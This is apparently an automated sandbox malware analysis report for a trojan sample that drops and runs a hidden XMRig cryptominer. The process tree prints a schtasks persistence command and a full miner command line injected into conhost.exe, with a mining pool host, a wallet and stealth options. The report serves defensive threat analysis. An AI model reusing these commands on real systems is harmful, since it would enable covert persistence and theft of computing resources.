Overview

overview

10

Static

static

SecuriteIn...68.exe

windows7_x64

10

SecuriteIn...68.exe

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    195s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    14-10-2021 08:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe

  • Size

    5.3MB

  • MD5

    f8d8071d3e0163eb4e816ec49d0b2e8e

  • SHA1

    a71da7648e0ee019d1594b583df94f4c6b7fae6c

  • SHA256

    40387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293

  • SHA512

    23dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf

Score
10/10
xmrigminer

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 12 IoCs
    miner
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe
    "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1984
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.InjectNET.14.313.1568.exe"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:844
      • C:\Windows\System32\cmd.exe
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1260
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Local\Temp\services64.exe"
          4⤵
          • Creates scheduled task(s)
          PID:1020
      • C:\Windows\System32\cmd.exe
        "cmd" cmd /c "C:\Users\Admin\AppData\Local\Temp\services64.exe"
        3⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1640
        • C:\Users\Admin\AppData\Local\Temp\services64.exe
          C:\Users\Admin\AppData\Local\Temp\services64.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2024
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\services64.exe"
            5⤵
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1744
            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
              6⤵
              • Executes dropped EXE
              PID:1964
            • C:\Windows\System32\conhost.exe
              C:\Windows/System32\conhost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=45JpPqakEn7EwqkL6WB28DLDt58UcCNARMdsAGo6VGdfUByVDFtFCxrNBD7UhWSNvGQCjvLgahxNrMc3T7szAVfj2JW7Kyq --pass=666 --cpu-max-threads-hint=90 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-kill-targets="" --cinit-idle-wait=5 --cinit-idle-cpu=50 --cinit-stealth --cinit-kill
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1372

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    f8d8071d3e0163eb4e816ec49d0b2e8e

    SHA1

    a71da7648e0ee019d1594b583df94f4c6b7fae6c

    SHA256

    40387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293

    SHA512

    23dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    1f88c4258f73d6b14dcb92dd6cc68d11

    SHA1

    fdcfdee8671895974de7a615886f2c2fa926289d

    SHA256

    99e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1

    SHA512

    a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77

    Download Submit
  • \Users\Admin\AppData\Local\Temp\services64.exe
    MD5

    f8d8071d3e0163eb4e816ec49d0b2e8e

    SHA1

    a71da7648e0ee019d1594b583df94f4c6b7fae6c

    SHA256

    40387bebfe97eea9c90425caf5519019dfc0e7425bb238246ec9f7bb5d621293

    SHA512

    23dd39d2d4906779a44db6aa112c0a7317004664753facfe19233bb742f84ae8c039c0dbe26d85f16a46dd2cd1e97cc1b594dfa23f7cf3deb0dac5eeed10dabf

    Download Submit
  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    1f88c4258f73d6b14dcb92dd6cc68d11

    SHA1

    fdcfdee8671895974de7a615886f2c2fa926289d

    SHA256

    99e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1

    SHA512

    a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77

    Download Submit
  • \Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
    MD5

    1f88c4258f73d6b14dcb92dd6cc68d11

    SHA1

    fdcfdee8671895974de7a615886f2c2fa926289d

    SHA256

    99e6f9f570f7d401de9fd417595adeabe4a0a5d4a9093e51c99437596e1fb2d1

    SHA512

    a235d17555a352492f7ffc8308c1a8ff89da0475bd6ef0dc8799f59887986056eae0a1a720c2b2f5d5a418e0eba9d31027fd10d60f4f598eae08a4e5e7459f77

    Download Submit
  • memory/844-67-0x000000001B0F4000-0x000000001B0F6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/844-66-0x000000001B0F2000-0x000000001B0F4000-memory.dmp
    Filesize

    8KB

    Download
  • memory/844-68-0x000000001B0F6000-0x000000001B0F7000-memory.dmp
    Filesize

    4KB

    Download
  • memory/844-69-0x000000001B0F7000-0x000000001B0F8000-memory.dmp
    Filesize

    4KB

    Download
  • memory/844-62-0x000000001B390000-0x000000001B5AC000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/844-61-0x00000000001C0000-0x00000000003E0000-memory.dmp
    Filesize

    2.1MB

    Download
  • memory/1020-65-0x0000000000000000-mapping.dmp
    Download
  • memory/1260-64-0x0000000000000000-mapping.dmp
    Download
  • memory/1372-89-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-96-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-102-0x0000000000440000-0x0000000000460000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1372-101-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-100-0x0000000000120000-0x0000000000140000-memory.dmp
    Filesize

    128KB

    Download
  • memory/1372-82-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-83-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-84-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-85-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-87-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-99-0x000000014030F3F8-mapping.dmp
    Download
  • memory/1372-98-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-92-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-97-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-95-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-94-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1372-93-0x0000000140000000-0x0000000140786000-memory.dmp
    Filesize

    7.5MB

    Download
  • memory/1640-70-0x0000000000000000-mapping.dmp
    Download
  • memory/1744-86-0x000000001B092000-0x000000001B094000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1744-91-0x000000001B097000-0x000000001B098000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1744-90-0x000000001B096000-0x000000001B097000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1744-88-0x000000001B094000-0x000000001B096000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1964-80-0x0000000000000000-mapping.dmp
    Download
  • memory/1984-59-0x0000000000400000-0x0000000000CD3000-memory.dmp
    Filesize

    8.8MB

    Download
  • memory/2024-74-0x0000000000400000-0x0000000000CD3000-memory.dmp
    Filesize

    8.8MB

    Download
  • memory/2024-72-0x0000000000000000-mapping.dmp
    Download